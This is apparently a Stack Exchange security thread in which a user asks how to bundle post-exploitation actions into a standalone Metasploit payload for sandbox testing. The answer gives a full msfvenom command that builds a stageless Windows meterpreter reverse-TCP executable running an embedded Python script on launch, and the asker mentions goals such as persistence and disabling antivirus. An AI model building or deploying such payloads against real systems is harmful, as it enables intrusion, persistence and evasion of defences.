3

I know how to create payloads using Metasploit and then script a AutoRun script, so when the victim machine connects back to my Kali Server it execute some actions. Works sweet!

What I wanted to do is create a payload weaponized with actions (Create process, change firewall rules, check VM, etc...) so I can run actions without the need to connect back to my Kali host.

Do you know if this is possible with Metasploit or Meterpreter? In case it isn't possible, is there is any app I can use to create standalone payloads?

This is for a POC and the intention is to test effectiveness of some sandboxing solutions.

schroeder
  • 123,438
  • 55
  • 284
  • 319
Frosa
  • 123
  • 1
  • 1
  • 6
  • With a quick Google search, I found "autoruncommands.rc" – schroeder Feb 08 '15 at 22:18
  • Tried this... these autoruncommands is what im using at the moment. They're executed only after the target machine contacts meterpreter server. – Frosa Feb 08 '15 at 23:55

2 Answers2

2

I am not sure how much you are familiar with the Meterpreter ecosystem but if you have some experience, this should be easy to achieve through the python bindings in the stageless meterpreter.

The stageless meterpreter has an attribute called EXITINIT which can be set to any arbitrary python script and the session will execute the commands even before the handler is contacted. For this to work, it is important that the python extension is loaded. Both of these tasks can be achieved through:

msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> EXTENSIONS=stdapi,priv,python EXTINIT=python,/root/met.py -f exe -o met-stageless.exe

As can be seen, the EXTENSIONS are set to load python which will bake it into the generated EXE while the EXITINIT will load the python extension (by default only stapi is loaded) and run the commands specified in the /root/met.py file. If you can code an action in python (pretty much anything), you can run it through the python extension.

void_in
  • 5,541
  • 1
  • 20
  • 28
0

Have no real experience, but how 'bout this from the Metasploit docs:

  • Staged Stager: payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

But I can't figure out if you need to be connected to the victim or not. It either executes the payloads in given order based on how the previous stage executed locally, or the decision is made on your machine - and therefore you have to be connected.

user1164108
  • 337
  • 1
  • 2
  • Yes. you need. What i want to do is pack the stager with post exploitation modules (Ex: Persistence, proccess migration, av detection, av kill... etc...). – Frosa Feb 08 '15 at 23:57
  • Anyone knows a good framework to write custom exploits that doesn't necessarily need to contact a server to execute functions? – Frosa Feb 09 '15 at 19:23